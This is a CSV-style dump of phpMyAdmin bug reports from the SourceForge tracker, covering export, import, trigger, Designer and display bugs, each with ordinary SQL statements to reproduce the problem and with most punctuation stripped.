Original URL https sourceforge.net p phpmyadmin bugs 2896 Original author lem9 Found in version 3.2.0","bug"
"24444","9260","Unknown column Event priv in field list .
Arch Linux, MySQL 5.1.35 2, phpMyAdmin 3.2.0.1 1 If I click on the name of the database and turn to page privileges, I get this error 1054 Unknown column Event priv in field list Original URL https sourceforge.net p phpmyadmin bugs 2897 Original author zersaa Found in version 3.2.0","bug"
"24444","9261","fatal error no output due to date default timezone get ).
In libraries common.inc.php a call to date default timezone get ) is made with error supression.
This can lead to PhpMyAdmin not displaying anything, if the call results in a fatal error.
Why did it result in an fatal error?
I installed phpMyAdmin in a chroot environment that had no timezone database.
As I couldn t find any error message, I had to insert a lot of echo )s into PhpMyAdmin to find the problem.
libraries common.inc.php 273 libraries common.inc.php 274 check timezone setting libraries common.inc.php 275 this could produce an E STRICT but only once, libraries common.inc.php 276 if not done here it will produce E STRICT on every date time function libraries common.inc.php 277 libraries common.inc.php 278 todo need to decide how we should handle this without ) libraries common.inc.php 279 libraries common.inc.php 280 date default timezone set date default timezone get )); Original URL https sourceforge.net p phpmyadmin bugs 2908 Original author hspath Found in version 3.2.1","bug"
"24444","9262","ODS incorrect DATE, DATETIME and TIME fields.
When exporting a table to Open Document Spreadsheet format, date and time fields are formatted incorrectly.
In the content.xml file the DATE, TIME and DATETIME fields are formatted as lt;table table cell office value type= string gt; lt;text p gt;[value] lt; text p gt; lt; table table cell gt; with [value] the iso formatted content of the field.
Rather than string the value type should be date or time with the date value or time value encoded as a value attribute per the xmlschema part 2 reference duration for value type= time and date or date and time for value type= date ).
Original URL https sourceforge.net p phpmyadmin bugs 2898 Original author jknockaert Found in version 3.2.0","bug"
"24444","9263","incorrect output parsing.
See screen shot.
Sorry I could not easily take a screen shot of the Add privileges on the following database drop down so I showed the code in Firebug Ubuntu has a bug that does not render drop downs correctly in screenshots).
Anyhow as you can see all the databases are displayed as something\ something instead of something something for some reason a slash is being added to escape a character that does not need escaping in xhtml.
Original URL https sourceforge.net p phpmyadmin bugs 2910 Original author ramaboo","bug"
"24444","9264","UUID Primary Key wrongly updated.
PMA version 3.2.0.1, MySQL server version 5.0.51b community nt log CREATE TABLE foo foo uuid CHAR 36) PRIMARY KEY, foo data INT); Insert a row.
Leave the foo uuid column empty, but enter 123 in the foo data column.
PMA executes the following command INSERT INTO `test`.`foo` `foo uuid` , `foo data` ) VALUES UUID ) , 123 ); Note that it has automatically assigned the foo uuid column.
Now, edit the row, changing 123 to 456.
PMA executes the following SQL UPDATE `test`.`foo` SET `foo uuid` = UUID ) , `foo data` = 456 WHERE `foo`.`foo uuid` = 87a46e15 c545 102c bd9f d5b50e269472 LIMIT 1 ; Note that it is changing the existing value of foo uuid.
This is wrong.
UUID values should be fixed, once they are created.
Changing them breaks foreign key relationships, etc.
Original URL https sourceforge.net p phpmyadmin bugs 2899 Original author fisharebest Found in version Latest Git","bug"
"24444","9265","Cannot edit row with no PK and a BIT field.
When trying to edit a row in a many to many table with no primary key defined and a binary value, I receive this message MySQL returned an empty result set i.e.
zero rows).
The problem is related to the binary field and the way it is received from the web browser.
Here is the table structure with some data Table structure for table `clients addresses` CREATE TABLE IF NOT EXISTS `clients addresses` `client id` int 11) NOT NULL, `address id` int 11) NOT NULL, `primary address` bit 1) NOT NULL DEFAULT gt; , KEY `client id` `client id`), KEY `address id` `address id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `clients addresses` `client id`, `address id`, `primary address`) VALUES 2001, 1, gt; ), 2002, 2, gt; ), 2003, 3, gt; ), 2004, 4, gt; ), 2005, 5, gt; ) As you can see in the attached screen shot of the address bar, this is what shows up.
If I change the binary box in the address bar to 0001 everything works just fine.
I am unsure if this is a browser or phpMyAdmin problem.
Regan Original URL https sourceforge.net p phpmyadmin bugs 2900 Original author protekcs","bug"
"24444","9266","In Designer the relationship edit popup is blank.
This applies to latest stable release 3.2.1), a development snapshot 3.3.0 dev) and demo page 3.3.2 dev).
Tested against FF and IE 8.
Server localhost via TCP IP Server version 5.1.30 community Apache 2.2.11 Win32) DAV 2 mod ssl 2.2.11 OpenSSL 0.9.8i mod autoindex color PHP 5.2.8 Client version MySQL 5.1.30 Extension PHP mysql Recreation steps 1\.
Use following script to create simple table structure SET SQL MODE= NO AUTO VALUE ON ZERO ; CREATE TABLE IF NOT EXISTS `t1` `id` int 10) unsigned NOT NULL AUTO INCREMENT, `fk` int 10) unsigned NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci AUTO INCREMENT=1 ; CREATE TABLE IF NOT EXISTS `t2` `ida` int 10) unsigned NOT NULL AUTO INCREMENT, `a` varchar 15) COLLATE utf8 unicode ci NOT NULL, `b` varchar 25) COLLATE utf8 unicode ci NOT NULL, PRIMARY KEY `ida`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci AUTO INCREMENT=1 ; 2\.
Open Designer.
3\.
Create new relation between t2.ida and t1.fk fields.
Designer will open popup window which allowed to choose relation options.
This window is blank no output).
The url shows http demo.phpmyadmin.net QA 3 2 pmd general.php?db=luktest server=1 token=e0381223e5844d56cb28a45492f675fb .
4\.
This prevents from creating relations via Designer.
Original URL https sourceforge.net p phpmyadmin bugs 2901 Original author lucius81 Found in version 3.2.1","bug"
"24444","9267","Exporting results LIMIT inside subquery).
Hello Support, When running a particular MySQL query, the results are unable to be exported.
When the query is modified slightly, the results can be exported.
If I look at the HTML source for the page, I can see that in the first instance, the hidden variable sql query is truncated and does not contain the full query as a value.
I can provide exact steps to reproduce, I ve set up a test account with the necessary database created and example queries to illustrate the issue.
I noticed these support issues are public displayed and I didn t want to post login details if they are going to be publicly accessible.
Let me know if it s safe to provide login details and I can post them to this case.
Ryan Original URL https sourceforge.net p phpmyadmin bugs 2919 Original author acenetryan","bug"
"24444","9268","Default value for a BIT column.
The default value for a BIT column is not displayed correctly.
Original URL https sourceforge.net p phpmyadmin bugs 2902 Original author lem9 Found in version 3.2.0","bug"
"24444","9269","Trigger export with database name.
Hi, On my old database, I exported all tables including triggers to a new database but triggers was not create.
When I see SQL orders, tables names are without database name but triggers are with old database name.
Original URL https sourceforge.net p phpmyadmin bugs 2903 Original author sgarin Found in version 3.1.5","bug"
"24444","9270","Trigger export with database name.
Hi, On my old database, I exported all tables including triggers to a new database but triggers was not create.
When I see SQL orders, tables names are without database name but triggers are with old database name.
Original URL https sourceforge.net p phpmyadmin bugs 2904 Original author sgarin Found in version 3.1.5","bug"
"24444","9271","Order by desc sometimes not working.
Hi, When I click on the column header, the order by isn t changed from asc to desc.
This only fails for the functional columns, the others work fine.
SELECT p .
, from unixtime last online time ) , from unixtime p.ctime ) FROM `xwi players` p INNER JOIN xwi serials USING sid ) WHERE valid lt;0 AND flags 2 ORDER BY from unixtime last online time ) ASC LIMIT 0 , 30 Original URL https sourceforge.net p phpmyadmin bugs 2905 Original author olafvdspek","bug"
"24444","9272","Order by blob > blow is shown in range.
When you order by a field, the field range is shown in the header.
Even when that field is a blob... That gets kind of ugly when there s a few mb of binary data in that blob.
;) Original URL https sourceforge.net p phpmyadmin bugs 2906 Original author olafvdspek Found in version 3.2.1","bug"
"24444","9273","Large DROP leads to logout.
I have a DB with a few tables, a mage2 subtable space magento shop system, around 198 tables), and tried to drop the mage2 tables completely by double clicking on them, then CHECK ALL, then action DROP, and I get logged out and dropped back to the login screen with the URL showing http my host.com my phpadmin dir db structure.php with junk characters weird junk characters from all over the character set) filled in the username field, and nothing filled in the password field.
Logging in again and repeating gives the same result.
Dropping less tables at a time manually selecting 20,30,40 or so) works just fine, dropping the remaining 40 with a CHECK ALL works as well.
Seems to be a string too long, initially there were around 198 tables in the DB that I wanted to drop at once.
No clue if this is a security issue as well, marking private just in case, feel free to open it if it is not.
Cheers Nils Original URL https sourceforge.net p phpmyadmin bugs 2907 Original author lohner Found in version 3.2.0","bug"
"24444","9274","Add a field and key named key , missing escape..
I think the attached screenshot is self explanitory.
Original URL https sourceforge.net p phpmyadmin bugs 2909 Original author mattalexx123 Found in version 3.1.2","bug"
"24444","9275","Adding foreign key when table name contains a dot.
When trying to add a foreign key to a table field and if the table names contain a dot, then the generated SQL command is wrong.
DB nfltlgl Tables nfl.seasontypes; nfl.season Wanted foreign key for `nfl.season`.`type` is `nfl.seasontypes`.`type` phpmyadmin ALTER TABLE `nfl.season` ADD FOREIGN KEY `type` ) REFERENCES `nfltlgl`.`nfl` `seasontypes` ); correct ALTER TABLE `nfl.season` ADD FOREIGN KEY `type` ) REFERENCES `nfl.seasontypes` `type`); So phpmyadmin somehow splits the table name instead of using it completely.
Workaorund is too use nfl as a prefix and avoid dots in table names.
Original URL https sourceforge.net p phpmyadmin bugs 2927 Original author maddes Found in version 3.2.2","bug"
"24444","9276","Source Forge Bug Tracker Setup.
Your current setup limits uploads to 256k.
This may not be something you have control over but if you do you should raise it.
256k is not enough to upload a png screenshot at 1920x1200.
Original URL https sourceforge.net p phpmyadmin bugs 2911 Original author ramaboo","bug"
"24444","9277","Slow export when having lots of databases.
When using phpMyAdmin 3.1.5 with MySQL 5.0.32 and lots of bases gt; 4000), it is very slow to export data.
I had previously a problem of slow browsing when using 2.9.1 but it was solved by using 3.1.5 and the DisableIS parameter.
The SHOW PROCESSLIST in mysql tell me that MySQL spend lot of time in various select of information schema, for example more than 77 seconds to execute this request SELECT TRIGGER SCHEMA, TRIGGER NAME, EVENT MANIPULATION, ACTION TIMING, ACTION STATEMENT, EVENT OBJECT SCHEMA, EVENT OBJECT TABLE FROM information schema.TRIGGERS WHERE TRIGGER SCHEMA= testingbaseslow and EVENT OBJECT TABLE = evo items itemtag my provider doesn t want to update MySQL to 5.1.22 and I didn t see any improvement for the export in phpMyAdmin 3.2.0.1 changelog.
Original URL https sourceforge.net p phpmyadmin bugs 2912 Original author shadow walker Found in version 3.1.5","bug"
"24444","9278","Class PMA Error Handler not found.
When trying to launch phpMyAdmin I receive the following error Fatal error Class PMA Error Handler not found in C \wamp\apps\phpmyadmin3.1.3\libraries\common.inc.php on line 57 Windows Machine I am running php 5.2.9 1 mySQL 5.1.32 Apache 2.2.11 copy of php.ini attached Original URL https sourceforge.net p phpmyadmin bugs 2913 Original author digitaldefault Found in version 3.3.7","bug"
"24444","9279","Inconsistant behaviour when importing SQL.
I try to import the attached SQL file using the import sql tool.
I leave the settings on default and I get an error SQL query INSERT INTO a roads VALUES 0, 5306, A Road, Dual C\ way under construction , 49213, A63 OPENNOV2008 , GeomFromText LINESTRING 1.519569755364 53.787478680944, 1.5166250727726 53.786136456711, 1.513925831962 53.785900817659, 1.5116978320516 53.786916526622, 1.5090805144054 53.787463166397) ) ) ; MySQL said Documentation 1062 Duplicate entry 0 for key PRIMARY Fine, it is clearly faulty MySQL.
Except when I run the exact same SQL, copied and pasted directly from that file into the query box in phpmyadmin, it runs 100 perfectly with no errors.
So, as the subject says, clearly there s some inconsistancy here in the way the same data is treated through two different input methods.
MySQL Server localhost via TCP IP Server version 5.1.37 community Protocol version 10 User root localhost MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.10 Win32) PHP 5.2.6 MySQL client version 5.0.51a PHP extension mysql phpMyAdmin Version information 3.2.0.1 Original URL https sourceforge.net p phpmyadmin bugs 2914 Original author moriarty Found in version 3.2.0","bug"
"24444","9280","Privileges link not shown.
on the server page of phpMyAdmin, the link Privileges is not shown in the link line containing databases, sql, status, variables, charsets etc) the user has full privileges this problem occurs only on a test installation with phpMyAdmin 3.2.1 PHP 5.3 MySQL 5.4.1 it does not happen with phpMyAdmin 3.2.1 PHP 5.3 MySQL 5.1 nor with phpMyAdmin 3.2.1 PHP 5.2 MySQL 5.4 nor with phpMyAdmin 3.2 dev as of 2009 08 11) PHP 5.3 MySQL 5.4 is there a simple fix for 3.2.1 which obviously is already included in 3.2 dev)?
I am currently preparing a virtual machine containing phpMyAdmin, and I would prefer to use a official phpMyAdmin version, not a developer snapshot Original URL https sourceforge.net p phpmyadmin bugs 2915 Original author kofler Found in version 3.2.1","bug"
"24444","9281","Inconsistent behavior for editing table records.
phpMyAdmin version 3.2.0.1, on FC9 with Apache 2.2.9 and PHP 5.2.9.
MySQL version 5.0.77 both client and server), running locally host=localhost).
Browser Firefox 3.0.11.
I created a database with a single table SET SQL MODE= NO AUTO VALUE ON ZERO ; CREATE DATABASE `HA adherents` !40100 DEFAULT CHARACTER SET utf8 CREATE TABLE `adherents` `ID` int 11) NOT NULL, `Nom` varchar 40) NOT NULL, `Prxc3xa9nom` varchar 40) NOT NULL, `Adresse` varchar 100) NOT NULL, `CP` int 11) NOT NULL, `Ville` varchar 30) NOT NULL, `Txc3xa9l` text, `E mail` varchar 40) NOT NULL, `CallSign` varchar 8) NOT NULL, `Mdp` varchar 10) NOT NULL, `Valide` tinyint 1) default NULL, PRIMARY KEY `ID`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; I can import records in the above table, but then when I want to edit any row, I get the following error message as soon as I click on the pencil icon Method Not Implemented GET to phpMyAdmin tbl change.php not supported.
The same error also happens on other databases tables on the same server.
More surprisingly, sometimes it happens only on some tables of a database, but never happens on other tables of the same database; in other words, editing row contents works perfectly fine on some tables, but always yields the above error on other tables within the same database.
This error happens whichever MySQL user is used by PMA ie.
even for root user).
Original URL https sourceforge.net p phpmyadmin bugs 2916 Original author amreg","bug"
"24444","9282","No index used in query... exception.
When mysqli driver is used, and some databases exist this exception is displayed randomly making PMA useless.
AFAIR it s bogus exception, a bug in PHP 5.x.
There is a very quick fix for this bug all you have to do is add one line to libraries dbi mysqli.dbi.lib.php, it works fine when added as close to beginnig as possible.
The line is mysqli report MYSQLI REPORT ERROR); This bug is present in all PMA versions above 3.0.
I would appreciate if it would be fixed in further versions.
Now I have to fix it myself every time I install new PMA.
Original URL https sourceforge.net p phpmyadmin bugs 2937 Original author harry32 Found in version 3.2.3","bug"
"24444","9283","Case sensitive columns in pma table.
When pma table info.table name is filled with the case sensitive column name, the relation is well displayed in the relation manager but the feature isn t working.
I have to convert the column pma table info.table name in lowercase to make it working tooltips are ok) but it s breaking the relation manager I can t see my table description field anymore).
I m using MySql 5.1.37 Windows XP.
MySql is configured with lower case table names=0 default storage engine=INNODB Original URL https sourceforge.net p phpmyadmin bugs 2939 Original author mikamikaze Found in version 3.2.3","bug"
"24444","9284","Garbled data in navi frame PHP 5.2.11 bug).
With PHP 5.2.11 on Apache with zlib.output compression = On and a low number of bytes in the navi frame, it displays garbled data.
Original URL https sourceforge.net p phpmyadmin bugs 2940 Original author lem9 Found in version 3.2.3","bug"
"24444","9285","Run complex SQL then export does not work.
Silly little bug and very easy to get around, ive noticed it a few times in v3 but only got around to saying now Specific scenario is select a DB and before you select a table just run a complex SQL stmnt by clicking on the SQL tab Eg dont slate me on this I have a 300 line version and this is the simlist form I could think of) SELECT id FROM SELECT id FROM bundles ) tmp The paging also goes a bit whack but if you now click on export etc at the bottom) of the page your just taken back to the SQL box.
HTH Simon.
Original URL https sourceforge.net p phpmyadmin bugs 2917 Original author r si Found in version 3.2.1","bug"
"24444","9286","Triggers order on export.
Triggers can modify already imported tables.
To avoid this all triggers must be created after all INSERT statements.
`mysqldump` utility generate code in correct order.
phpMyAdmin does not.
Original URL https sourceforge.net p phpmyadmin bugs 2918 Original author hexone Found in version 3.2.1","bug"
"24444","9287","Left navigation Panel not working under PHP 5.3.0.
I just upgraded phpMyAdmin to 3.2.1 PHP version was 5.2.9, Apache 2.2.11, OS is Solaris 10 SPARC); everything worked fine.
Then, i upgraded PHP to 5.3.0, and, after that, the left navigation bar just disappeared the rest is still working.
No corresponding entries in Apaches error log.
Original URL https sourceforge.net p phpmyadmin bugs 2920 Original author wkaiser666 Found in version 3.2.1","bug"
"24444","9288","SQL truncated to one character.
PMA version 3.2.0.1 Create a database, open an SQL window, and run a CREATE FUNCTION script.
Here s one for you to cut paste CREATE FUNCTION count letters s VARCHAR 255), l VARCHAR 1)) RETURNS INTEGER NO SQL DETERMINISTIC BEGIN DECLARE n INTEGER DEFAULT 0; DECLARE p INTEGER DEFAULT LENGTH s); WHILE p gt;0 DO IF SUBSTR s, p, 1)=l THEN SET n=n 1; END IF; SET p=p 1; END WHILE; RETURN n; END Set the delimiter to and click Go .
In the top of the screen there is a box showing the SQL that was just executed.
It just contains the first letter C .
If you click the edit link, you get the full SQL back.
If the script had started with DROP FUNCTION IF EXISTS ... , then the letter D would be displayed, etc.
[My guess is that the code is confusing strings with arrays, and the subscript [0] gives the first char, rather than the first element.]
Original URL https sourceforge.net p phpmyadmin bugs 2921 Original author fisharebest Found in version 3.2.0","bug"
"24444","9289","Adding relations results in blank window popup.
Hi, Whenever I want to create relations in a database it, clicking the Create Relations button in Design and add relation between to tables, does absolutely nothing.
It just states that it has been Loaded .
Before this, whenever I wanted to add a relation it opened a pop up that was blank.
Steps to reproduce Enter Designer gt; Create a Relation between two tables.
gt; Nothing happens or pop up appears Original URL https sourceforge.net p phpmyadmin bugs 2922 Original author eaxexe Found in version 3.2.1","bug"
"24444","9290","Renaming database deletes triggers.
3.2.2rc1 The rename database option does not copy triggers from the old database to the new one, and they are lost.
Original URL https sourceforge.net p phpmyadmin bugs 2923 Original author fisharebest Found in version 3.2.2","bug"
"24444","9291","phpmyadmin, load balancer and memcache.
Hi, I have an issue on my ubuntu 8.04LTS setup with phpmyadmin and memcache in a web farm.
The session are not created read OK, I can t login if I have more than 1 web server in the farm.
My others PHP applications using PHP sessions are working fine with multiple servers.
I m using the latest version of PHP5 apache MySQL Memcache and phpmyadmin from the ubuntu repo.
Can you help me to debug this issue?
The message I have is 1045 Access denied for user L xc2xb1xc2xb5 xc2xa8xc3x9dv 192.168.1.3 I have cleaned my cookies, but it doesn t fix the problem.
I have the same behaviour with hardware Cisco load balancer and LVM softwqre load balancer.
Thanks for your help.
Vincent.
Original URL https sourceforge.net p phpmyadmin bugs 2924 Original author valloo Found in version 3.2.2","bug"
"24444","9292","Problem opening links in right frame.
After refreshing left frame click on the database name) with cfg[ LeftFrameLight ] = true; cfg[ DisplayDatabasesList ] = true; parameters set i.e.
no drop dowm and sliders) all next clicks by lt;a href... for example home or table name) are opens in a new window instead of frame content.
But, after refreshing frame by selecting another database from drop down list all lt;a href gt; works well.
I ve tried to correct it by myself manually wrote lt;a href= ... target= frame content gt;... lt; a gt; in navigation.php), but windows stil opening in a new window or tab).
Tested on phpMyAdmin 3.2.2 and 3.2.3 Google chrome 3.0.195.33 Internet Explorer 8.0.6001.18828 P.S.
It seems to be a browser problem it looses frames connectivity, but i have no chance to understand.
sorry for my english) Original URL https sourceforge.net p phpmyadmin bugs 2948 Original author hexone","bug"
"24444","9293","mySQL parser doesn t respect for commenting.
The parser doesn t respect for commenting, only lt;space gt; hyphenhyphenspace) is supported So this works SELECT 1 Test union SELECT 2; But this not SELECT 1 Test union SELECT 2; SQL standards tell us that just hyphenhyphen is enough to comment a line and the additional space is not required.
Ries Original URL https sourceforge.net p phpmyadmin bugs 2925 Original author rvt Found in version 3.3.7","bug"
"24444","9294","Wide text changes wildcard to error.
If I enter the following query SELECT FROM table WHERE column LIKE name ; After I receive results if I click on the lt; T gt; to view the full width column results, it changes the query to SELECT FROM table WHERE column LIKE ?me ; With ?
being a character set error not an actual ?
mark) And returns no results I m assuming its trying to decode the na Version 2.11.9.4 BTW, I couldn t find any mention of this in the bug database though.
Original URL https sourceforge.net p phpmyadmin bugs 2926 Original author mindstalker","bug"
"24444","9295","non existing date displayed.
phpmyadmin shows a date 2009 09 31) that is not existing when viewing the table in phpmyadmin.
In my front end the date is however shown correctly as 2009 10 01.
Original URL https sourceforge.net p phpmyadmin bugs 2928 Original author cloullin Found in version 2.6.4 pl1","bug"
"24444","9296","Failed opening required mysql charsets.lib.php .
After clicking Enable Statistics in server databases.php, pma throws a require error Fatal error require once ) [function.require] Failed opening required mysql charsets.lib.php include path= .
usr local share pear ) in srv www vhost paka phpMyAdmin 3.2.2 all languages libraries database interface.lib.php on line 594 Included patch fixes issue by prefixing libraries to require once filespec.
uname a FreeBSD paka.cyberleo.net 7.2 RELEASE p3 FreeBSD 7.2 RELEASE p3 1 Fri Jul 31 07 52 14 EDT 2009 cyberleo paka.cyberleo.net usr obj usr src sys PAKA amd64 phpMyAdmin version 3.2.2 MySQL version 5.0.85 PHP version 5.2.10 Original URL https sourceforge.net p phpmyadmin bugs 2929 Original author cyberleo Found in version 3.2.2","bug"
"24444","9297","Fatal error PMA sendHeaderLocation IE6).
You don t allow submitters to re open auto closed items, so this is just a continuance of http sourceforge.net tracker index.php?func=detail aid=1838946 group id=23067 atid=377408 I use MySQL 5.1.37 and IE6 SP3.
Here s how to re produce it whenever I use Check All global drop , I get these errors 0 PMA sendHeaderLocation mydomain pma tbl structure.php?db=mydb table=mytable token=8ad2969d12615ac4a7d8a4c19ce9865e sql query=SELECT 2A FROM 60mytable 60 message=MySQL returned an empty result set 28i.e.
zero rows 29.
28 Query took 0.0004 sec 29) called at [ var www html pma sql.php 558] 1 require var www html pma sql.php) called at [ var www html pma tbl row action.php 156] The deletion does get through though, so it s only a fatal error in that you reach a dead end output.
Original URL https sourceforge.net p phpmyadmin bugs 2930 Original author l w c Found in version 3.1.0","bug"
"24444","9298","Double htmlspecialchars when editing enum column.
CREATE TABLE test entity ENUM amp;lrm; , amp;rlm; ) ); Edit the structure of the entity column.
The length values field becomes amp;amp;lrm; , amp;amp;rlm; Original URL https sourceforge.net p phpmyadmin bugs 2931 Original author fisharebest Found in version 3.2.2","bug"
"24444","9299","Large designer boxes.
Version 3.2.2.1 The box s width is initially set by the space needed for the table name.
When the box is expanded, the width grows to show the table details.
This width is not reset once the box has been collapsed.
The attached picture demonstrates what I am talking about.
It might also be a good idea to create break a line into two if it is much longer than the rest of the lines for the table.
Original URL https sourceforge.net p phpmyadmin bugs 2932 Original author theplan Found in version 3.2.2","bug"
"24444","9300","Binary fields are corrupted on edits.
There seems to be a bug, where by if you edit a particular record which has a binary field, even if you do not touch that particular field, it will become corrupted as phpmyadmin record editor updates all values.
However the key here is that it is unable to retrieve and re set the value to the same one as it was before.
Atatched are files called schema.sql Original URL https sourceforge.net p phpmyadmin bugs 2957 Original author starcraftmazter Found in version 3.2.4","bug"
"24444","9301","Cannot login when blowfish secret very long.
Basically summary says it all.
I wanted to have my pma installation very strong so I set blowfish secret to a random string of 63 characters.
After that I could not log in.
After submiting username and password pma just refreshes clearing these fields and no error message is shown.
This took me awile to gigure out that blowfish secret was to long.
I was using cooke authentication.
Original URL https sourceforge.net p phpmyadmin bugs 2933 Original author blinkys Found in version 3.2.2","bug"
"24444","9302","Document side effects of MemoryLimit setting.
After some research on why all recent phpMyAdmin version returned blank pages after executing SQL queries or refreshing pages, I have found the following PHP borked on a very small memory limit when executing queries and refreshing pages because scripts setup.php uses a faulty default value for memory limit on at least v2.11.9.6.
The default value is the integer 32, which is translated by PHP to a memory limit of 32 bytes, a unusable default value.
Commenting the line in the config or chancing the value to the string 32M made the problems disappear.
Also, the documentation states that the memorylimit configuration option is only used when importing and exporting data, I believe that to be faulty as well.
In short scripts setup.php uses a faulty default value for memory limit on at least v2.11.9.6.
I couldn t find setup.php on 3.2.2.1 but those versions may also be affected.
The problem might go back to when the setting memorylimit was included in the source.
The documentation is unclear on where the defined memory limit is actually used.
Only when importing and exporting, or also when executing queries and refreshing pages?
My recommendations setup.php, if included, should provide a form that allows the memory limit to be set.
Although I ve made several configurations using setup.php, I was never aware of any configured memory limit.
According to the documentation the memorylimit option is an integer in bytes, but the example of 16M might lead users to conclude that the integer 16 would be a usable value.
My suggestion would be to add a clear example the integer 33554432 for a limit of 32 megabytes .
More on this and how I got to this particular problem can be found here https sourceforge.net projects phpmyadmin forums forum 72909 topic 3321122 Original URL https sourceforge.net p phpmyadmin bugs 2934 Original author boosty martijn","bug"
"24444","9303","Export of InnoDB table is incomplete.
When using the table export function with an InnoDB table, you will not always get every row in the table.
This is because the table export function seems to rely on show table status to get the number of rows in the table, which is then used to specify a range of rows to be exported.
This defaults to the number of rows shown in the show table status command with the starting row of 0.
Unfortunately, as indicated in many related bug reports, the show table status call on an InnoDB table is an estimate which can sometimes be too small.
If the estimate ends up being too small at that point in time, you will not get every row in the table.
You could use cfg[ MaxExactCount ] integer to work around this issue but it will severely impact the performance all around.
Another option, which is being used by some, is to manually increase the number that is set where it says Dump x row s) starting at record 0.
A solution would be to make that a radio selection where another choice is to export the whole table or to always force MaxExactCount when the export functionality is being used and the underlying table uses the InnoDB engine.
The first solution would perform much better but be a small UI change.
This feels like a bug to me but I would not be offended if this is reclassified as a feature request.
Original URL https sourceforge.net p phpmyadmin bugs 2935 Original author griffinmike","bug"
"24444","9304","Query error Adding a new indexed `order` field on a table.. How to reproduce Have an existing table with field.
In the structure tab, add 1 field, then click execute Enter the following information Field name order Type Int Size 12 Index Index Click Save.
The query will crash because order wasn t escaped properly.
Workarround Create the field without index.
Add the index manually after.
Original URL https sourceforge.net p phpmyadmin bugs 2936 Original author fmaz008 Found in version 3.1.2","bug"
"24444","9305","Inconsistent generated designer coords .
There are some default values which can be automaticaly entered for pma tables names.
First it shouldn t require clicking they should be entered by default.
The reason to change them to non default values occurs hardly ever.
And the bug part names entered by clicking an icon are inconsistent with create tables.sql script.
Precisely one is wrong pma designer coords .
It should be pma designer coords , but there is something else.
Suggested value is ok, but entered by clicking an icon is not.
Maybe that s the reason why hardly anyone uses Designer in PMA.
Preconfiguration of PMA tables could be done in PMA application itself, I don t understand why the user has to search for it in documentation, then search the script, than execute it in PMA or mysql.
The option of automatic pma db configuration should be available as soon as user logged in as root.
Original URL https sourceforge.net p phpmyadmin bugs 2938 Original author harry32 Found in version 3.2.3","bug"
"24444","9306","Statement may not be safe to log in stmt format.
Hi, I have a little problem with phpMyadmin.
Everytime when I change some data set via PHPmyadmin it adds A LIMIT 1 instead of just only use the primary key to identify this unique row.
That is the reason you have one, isn t it?
For normal users this behaviour shouldn t be a problem, but if you run a statement based replication it is, and can lead into inconsistency.
I get every time this notice Statement may not be safe to log in statement format .
Is there a possibility to switch this off?
Regards, Martin Original URL https sourceforge.net p phpmyadmin bugs 2941 Original author m u Found in version 3.2.3","bug"
"24444","9307","Typo and empty message.
Working on Russian translation found this little typos in English language file.
phpMyAdmin 3.2.3 Line 1037 strSetupServers connect type desc = How to connect to server, keep [kdb]tcp[ kdb] if unsure ; [kdb] is a mistake; have to be [kbd].
So strSetupServers connect type desc = How to connect to server, keep [kbd]tcp[ kbd] if unsure ; Line 1081 strSetupServers ssl desc = ; Empty string.
Can be something like strSetupServers ssl desc = Enable SSL for connection to MySQL server ; Original URL https sourceforge.net p phpmyadmin bugs 2942 Original author hanut","bug"
"24444","9308","Typo.
Found a typo in .
libraries Table.class.php, around line 277 unkown table status ... should be unknown table status Original URL https sourceforge.net p phpmyadmin bugs 2943 Original author pureform Found in version 3.2.2","bug"
"24444","9309","Empty default value not set properly.
phpMyAdmin 3.2.3, Apache 2.2.13 Unix), PHP 5.2.11 When editing VARCHAR field s structure that has empty string set as a default value the Default menu has None preselected instead of As defined .
The As defined should be preselected if the field has default value set, even if it is an empty sting.
If the default value is anything else than an empty string the As defined is correctly preselected with the correct string in the value field below.
Original URL https sourceforge.net p phpmyadmin bugs 2944 Original author eesau Found in version 3.2.3","bug"
"24444","9310","Copying table with bit field with default.
Error copying a table with a bit field with a default value.
Copy works if I remove the default.
Notice that the b for the bit field is jambed right next to the DEFAULT keyword with no space.
CREATE TABLE `Test`.`test` `Date` date NOT NULL DEFAULT 2009 01 01 , `Start` time NOT NULL DEFAULT 00 00 00 , `Stop` time NOT NULL DEFAULT 00 00 00 , `Vehicle` varchar 8 ) NOT NULL DEFAULT , `Job` varchar 8 ) NOT NULL DEFAULT , `ChangeMask` bit 8 ) NOT NULL DEFAULTb 0 , `LastSeen` timestamp NOT NULL DEFAULT 2000 01 01 00 00 00 , PRIMARY KEY `Date` , `Start` ) ) ENGINE = MYISAM DEFAULT CHARSET = utf8 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near DEFAULTb 0 , `LastSeen` timestamp NOT NULL DEFAULT 2000 01 01 00 00 00 , P at line 6 Original URL https sourceforge.net p phpmyadmin bugs 2945 Original author dhughes Found in version 3.5.8","bug"
"24444","9311","Database export do not exports constraints.
When i export a whole database to sql then the sql script do not contain the constraints of any table.
When i export the tables separately then the sql script contains the constraints.
Original URL https sourceforge.net p phpmyadmin bugs 2946 Original author gisraptor Found in version 3.2.3","bug"
"24444","9312","Show full partial texts not sticking on process list.
The show full text show partial texts option is sticky for the results of SQL queries.
It is not sticky for the results of the process list tab.
If you are monitoring activity on a DB by refreshing this page), and you spot an interesting query , it is truncated by default, and by the time you have selected full texts and refreshed, it has finished executing.
Perhaps this page needs a refresh button, instead of having to requery from the tab.
Alternatively, does this page really need a partial texts option at all.
If you re looking at processes, you generally want to see the entire statement.
Original URL https sourceforge.net p phpmyadmin bugs 2972 Original author fisharebest Found in version 3.3.0","bug"
"24444","9313","2.11.9.5 import escape character.
Lawyers Common Sense exports as Lawyers Common Sense but fails to import unless Lawyers\ Common Sense SQL pane takes it ) just fine.
Original URL https sourceforge.net p phpmyadmin bugs 2947 Original author asknight lv Found in version 2.11.9.x","bug"
"24444","9314","mysql errors not showing up in chroot jail.
I use phpmyadmin in different web chroot jail environments.
When trying to execute custom sql, for example, if its syntax is wrong phpmyadmin shows only mysql error number but no text describing the error.
Removing the chroot environment it works normally.
Custom php scripts connecting to mysql databases and executing the same sql displays error number and error text as usual even in chroot environment.
I tried versions 2.11.10, 3.2.5 and also 3.3.0 beta1 with same results.
Original URL https sourceforge.net p phpmyadmin bugs 2974 Original author madcat78","bug"
